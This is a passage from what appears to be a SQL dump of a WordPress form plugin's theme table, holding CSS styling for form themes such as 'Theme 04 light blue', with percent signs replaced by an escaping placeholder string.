84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DAA157 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(bottom, #F8DCB2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E7C187 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E6BE86 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DAA157 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -ms-linear-gradient(bottom, #F8DCB2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E7C187 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E6BE86 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DAA157 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: linear-gradient(to bottom, #F8DCB2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E7C187 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E6BE86 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DAA157 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	box-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\n	border-radius: 7px;\r\n	top: 1px;\r\n	left: 1px;\r\n	border: 1px solid #C0A77E;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #E2B983;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #AA824E;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #AA824E;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #E2B983;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #AA824E;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(14,'Theme 04 light blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #A0C5CF 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #95B3BB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #869AA0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #86A0A7 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #CEE4E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to bottom, #84B8C5 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #75A1AC 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #63929E 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #377483 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 